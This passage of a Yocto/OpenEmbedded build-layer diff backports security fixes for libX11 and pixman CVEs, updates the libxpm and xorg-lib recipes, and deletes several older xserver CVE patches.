+@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
+ 	EventToWireType proc)	/* routine to call when converting event */
+ {
+ 	register EventToWireType oldproc;
++	if (event_number < 0 ||
++	    event_number > LastExtensionEvent) {
++	    fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
++		    event_number);
++	    return (EventToWireType)_XUnknownNativeEvent;
++	}
+ 	if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
+ 	LockDisplay (dpy);
+ 	oldproc = dpy->wire_vec[event_number];
+@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
+ 	WireToErrorType proc)	/* routine to call when converting error */
+ {
+ 	register WireToErrorType oldproc = NULL;
++	if (error_number < 0 ||
++	    error_number > LastExtensionError) {
++	   fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
++		    error_number);
++	   return (WireToErrorType)_XDefaultWireError;
++	}
+ 	if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
+ 	LockDisplay (dpy);
+ 	if (!dpy->error_vec) {
+-- 
+GitLab
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
new file mode 100644
index 0000000000..dbdf096fc8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
+From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Sun, 17 Sep 2023 14:19:40 -0700
+Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
+ _XkbReadKeySyms()
+
+Make sure we allocate enough memory in the first place, and
+also handle error returns from _XkbReadBufferCopyKeySyms() when
+it detects out-of-bounds issues.
+
+Reported-by: Gregory James DUCK <gjduck@gmail.com>
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
+CVE: CVE-2023-43785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xkb/XKBGetMap.c | 14 +++++++++-----
+ 1 file changed, 9 insertions(+), 5 deletions(-)
+
+diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
+index 2891d21e..31199e4a 100644
+--- a/src/xkb/XKBGetMap.c
++++ b/src/xkb/XKBGetMap.c
+@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+             if (offset + newMap->nSyms >= map->size_syms) {
+                 register int sz;
+ 
+-                sz = map->size_syms + 128;
++                sz = offset + newMap->nSyms;
++                sz = ((sz + (unsigned) 128) / 128) * 128;
+                 _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
+                 if (map->syms == NULL) {
+                     map->size_syms = 0;
+@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+                 map->size_syms = sz;
+             }
+             if (newMap->nSyms > 0) {
+-                _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
+-                                          newMap->nSyms);
++                if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
++                                              newMap->nSyms) == 0)
++                    return BadLength;
+                 offset += newMap->nSyms;
+             }
+             else {
+@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
+             newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
+             if (newSyms == NULL)
+                 return BadAlloc;
+-            if (newMap->nSyms > 0)
+-                _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
++            if (newMap->nSyms > 0) {
++                if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
++                    return BadLength;
++            }
+             else
+                 newSyms[0] = NoSymbol;
+             oldMap->kt_index[0] = newMap->ktIndex[0];
+-- 
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
new file mode 100644
index 0000000000..31a99eb4ac
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
+From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:54:30 -0700
+Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
+ recursion in PutSubImage()
+
+When splitting a single line of pixels into chunks to send to the
+X server, be sure to take into account the number of bits per pixel,
+so we don't just loop forever trying to send more pixels than fit in
+the given request size and not breaking them down into a small enough
+chunk to fix.
+
+Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index 857ee916..a6db7b42 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -914,8 +914,9 @@ PutSubImage (
+ 		    req_width, req_height - SubImageHeight,
+ 		    dest_bits_per_pixel, dest_scanline_pad);
+     } else {
+-	int SubImageWidth = (((Available << 3) / dest_scanline_pad)
+-				* dest_scanline_pad) - left_pad;
++	int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
++                              * dest_scanline_pad) - left_pad)
++                              / dest_bits_per_pixel;
+ 
+ 	PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
+ 		    (unsigned int) SubImageWidth, 1,
+-- 
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
new file mode 100644
index 0000000000..4800bedf41
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
+From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:55:04 -0700
+Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
+ allowed by protocol
+
+The PutImage request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), same as the maximum dimensions of an X11
+Drawable, which the image is being copied to.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index a6db7b42..ba411e36 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include "Xlibint.h"
+ #include "Xutil.h"
+ #include <stdio.h>
++#include <limits.h>
+ #include "Cr.h"
+ #include "ImUtil.h"
+ #include "reallocarray.h"
+@@ -962,6 +963,10 @@ XPutImage (
+ 	height = image->height - req_yoffset;
+     if ((width <= 0) || (height <= 0))
+ 	return 0;
++    if (width > USHRT_MAX)
++        width = USHRT_MAX;
++    if (height > USHRT_MAX)
++        height = USHRT_MAX;
+ 
+     if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
+ 	dest_bits_per_pixel = 1;
+-- 
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
new file mode 100644
index 0000000000..d35d96c4dc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
+From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 16:12:27 -0700
+Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
+ out-of-range dimensions
+
+The CreatePixmap request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), so if either is larger than that, set it to 0
+so the X server returns a BadValue error as the protocol requires.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/CrPixmap.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/CrPixmap.c b/src/CrPixmap.c
+index cdf31207..3cb2ca6d 100644
+--- a/src/CrPixmap.c
++++ b/src/CrPixmap.c
+@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <config.h>
+ #endif
+ #include "Xlibint.h"
++#include <limits.h>
+ 
+ #ifdef USE_DYNAMIC_XCURSOR
+ void
+@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
+     Pixmap pid;
+     register xCreatePixmapReq *req;
+ 
++    /*
++     * Force a BadValue X Error if the requested dimensions are larger
++     * than the X11 protocol has room for, since that's how callers expect
++     * to get notified of errors.
++     */
++    if (width > USHRT_MAX)
++        width = 0;
++    if (height > USHRT_MAX)
++        height = 0;
++
+     LockDisplay(dpy);
+     GetReq(CreatePixmap, req);
+     req->drawable = d;
+-- 
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
new file mode 100644
index 0000000000..110bd445df
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
+From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
+From: Yair Mizrahi <yairm@jfrog.com>
+Date: Thu, 7 Sep 2023 16:15:32 -0700
+Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
+ leading to a heap overflow
+
+When the format is `Pixmap` it calculates the size of the image data as:
+    ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+There is no validation on the `width` of the image, and so this
+calculation exceeds the capacity of a 4-byte integer, causing an overflow.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ImUtil.c | 20 +++++++++++++++-----
+ 1 file changed, 15 insertions(+), 5 deletions(-)
+
+diff --git a/src/ImUtil.c b/src/ImUtil.c
+index 36f08a03..fbfad33e 100644
+--- a/src/ImUtil.c
++++ b/src/ImUtil.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include <stdio.h>
++#include <limits.h>
+ #include "ImUtil.h"
+ 
+ static int _XDestroyImage(XImage *);
+@@ -361,13 +362,22 @@ XImage *XCreateImage (
+ 	/*
+ 	 * compute per line accelerator.
+ 	 */
+-	{
+-	if (format == ZPixmap)
++	if (format == ZPixmap) {
++	    if ((INT_MAX / bits_per_pixel) < width) {
++		Xfree(image);
++		return NULL;
++	    }
++
+ 	    min_bytes_per_line =
+-	       ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+-	else
++		ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
++	} else {
++	    if ((INT_MAX - offset) < width) {
++		Xfree(image);
++		return NULL;
++	    }
++
+ 	    min_bytes_per_line =
+-	        ROUNDUP((width + offset), image->bitmap_pad);
++		ROUNDUP((width + offset), image->bitmap_pad);
+ 	}
+ 	if (image_bytes_per_line == 0) {
+ 	    image->bytes_per_line = min_bytes_per_line;
+-- 
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
index ebd2640743..248889a1d4 100644
--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
             file://libx11-whitespace.patch \
             file://CVE-2020-14344.patch \
             file://CVE-2020-14363.patch \
+            file://CVE-2021-31535.patch \
+            file://CVE-2022-3554.patch \
+            file://CVE-2022-3555.patch \
+            file://CVE-2023-3138.patch \
+            file://CVE-2023-43785.patch \
+            file://CVE-2023-43786-1.patch \
+            file://CVE-2023-43786-2.patch \
+            file://CVE-2023-43787-1.patch \
+            file://CVE-2023-43787-2.patch \
 "
 
 SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"
diff --git a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
index fda8e32d2c..4694f911be 100644
--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
 protocol."
 
 LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
 DEPENDS += "libxext libsm libxt gettext-native"
 PE = "1"
 
 XORG_PN = "libXpm"
+XORG_EXT = "tar.xz"
+EXTRA_OECONF += "--disable-open-zfile"
 
 PACKAGES =+ "sxpm cxpm"
 FILES_cxpm = "${bindir}/cxpm"
 FILES_sxpm = "${bindir}/sxpm"
 
-SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa"
-SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
+SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
 
 BBCLASSEXTEND = "native"
diff --git a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
index cc45696530..38cab99bbe 100644
--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
 
 require xorg-lib-common.inc
 
-LICENSE = "MIT-style"
+LICENSE = "HPND"
 LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
 
 DEPENDS += "virtual/libx11"
diff --git a/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
new file mode 100644
index 0000000000..d54ae16b33
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
+CVE: CVE-2022-44638
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
+
+From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
+From: Matt Turner <mattst88@gmail.com>
+Date: Wed, 2 Nov 2022 12:07:32 -0400
+Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
+
+Thanks to Maddie Stone and Google's Project Zero for discovering this
+issue, providing a proof-of-concept, and a great analysis.
+
+Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
+---
+ pixman/pixman-trap.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
+index 91766fd..7560405 100644
+--- a/pixman/pixman-trap.c
++++ b/pixman/pixman-trap.c
+@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
+ 
+     if (f < Y_FRAC_FIRST (n))
+     {
+-	if (pixman_fixed_to_int (i) == 0x8000)
++	if (pixman_fixed_to_int (i) == 0xffff8000)
+ 	{
+ 	    f = 0; /* saturate */
+ 	}
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
index 22e19ba069..5873c19bab 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
 SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
            file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
            file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
+           file://CVE-2022-44638.patch \
            "
 SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
 SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"
diff --git a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
index a566eaa45e..1e8525d874 100644
--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
 DEPENDS = "util-macros"
 
 XORG_PN = "${BPN}"
+XORG_EXT ?= "tar.bz2"
 
-SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
 
 S = "${WORKDIR}/${XORG_PN}-${PV}"
 
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
index b4f0760176..ce57982a7d 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
 INC_PR = "r8"
 
 XORG_PN = "xorg-server"
-SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2"
-
-CVE_PRODUCT = "xorg-server"
+SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
+
+CVE_PRODUCT = "xorg-server x_server"
+# This is specific to Debian's xserver-wrapper.c
+CVE_CHECK_WHITELIST += "CVE-2011-4613"
+# As per upstream, exploiting this flaw is non-trivial and it requires exact
+# timing on the behalf of the attacker. Many graphical applications exit if their
+# connection to the X server is lost, so a typical desktop session is either
+# impossible or difficult to exploit. There is currently no upstream patch
+# available for this flaw.
+CVE_CHECK_WHITELIST += "CVE-2020-25697"
 
 S = "${WORKDIR}/${XORG_PN}-${PV}"
 
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
deleted file mode 100644
index 4994a21d33..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:49:04 +0200
-Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
-
-CVE-2020-14346 / ZDI-CAN-11429
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
-CVE: CVE-2020-14346
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Xi/xichangehierarchy.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
-index cbdd91258..504defe56 100644
---- a/Xi/xichangehierarchy.c
-+++ b/Xi/xichangehierarchy.c
-@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
-     if (!stuff->num_changes)
-         return rc;
- 
--    len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
-+    len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
- 
-     any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
-     while (stuff->num_changes--) {
--- 
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
deleted file mode 100644
index cf3f5f9417..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Sat, 25 Jul 2020 19:33:50 +0200
-Subject: [PATCH] fix for ZDI-11426
-
-Avoid leaking un-initalized memory to clients by zeroing the
-whole pixmap on initial allocation.
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
-
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
-CVE: CVE-2020-14347
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- dix/pixmap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/dix/pixmap.c b/dix/pixmap.c
-index 1186d7dbbf..5a0146bbb6 100644
---- a/dix/pixmap.c
-+++ b/dix/pixmap.c
-@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
-     if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
-         return NullPixmap;
- 
--    pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
-+    pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
-     if (!pPixmap)
-         return NullPixmap;
- 
--- 
-GitLab
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
deleted file mode 100644
index 710cc3873c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:52:29 +0200
-Subject: [PATCH] Fix XkbSelectEvents() integer underflow
-
-CVE-2020-14361 ZDI-CAN 11573
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
-CVE: CVE-2020-14361
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- xkb/xkbSwap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
-index 1c1ed5ff4..50cabb90e 100644
---- a/xkb/xkbSwap.c
-+++ b/xkb/xkbSwap.c
-@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
-         register unsigned bit, ndx, maskLeft, dataLeft, size;
- 
-         from.c8 = (CARD8 *) &stuff[1];
--        dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
-+        dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
-         maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
-         for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
-             if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
--- 
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:55:01 +0200
-Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
-
-CVE-2020-14362 ZDI-CAN-11574
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
-CVE: CVE-2020-14362
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- record/record.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/record/record.c b/record/record.c
-index f2d38c877..be154525d 100644
---- a/record/record.c
-+++ b/record/record.c
-@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
- }                               /* SProcRecordQueryVersion */
- 
- static int _X_COLD
--SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
- {
-     int i;
-     XID *pClientID;
-@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-     swapl(&stuff->nRanges);
-     pClientID = (XID *) &stuff[1];
-     if (stuff->nClients >
--        stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
-+        client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
-         return BadLength;
-     for (i = 0; i < stuff->nClients; i++, pClientID++) {
-         swapl(pClientID);
-     }
-     if (stuff->nRanges >
--        stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
-+        client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
-         - stuff->nClients)
-         return BadLength;
-     RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
-@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
- 
-     swaps(&stuff->length);
-     REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
--    if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+    if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
-         return status;
-     return ProcRecordCreateContext(client);
- }                               /* SProcRecordCreateContext */
-@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
- 
-     swaps(&stuff->length);
-     REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
--    if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+    if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
-         return status;
-     return ProcRecordRegisterClients(client);
- }                               /* SProcRecordRegisterClients */
--- 
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
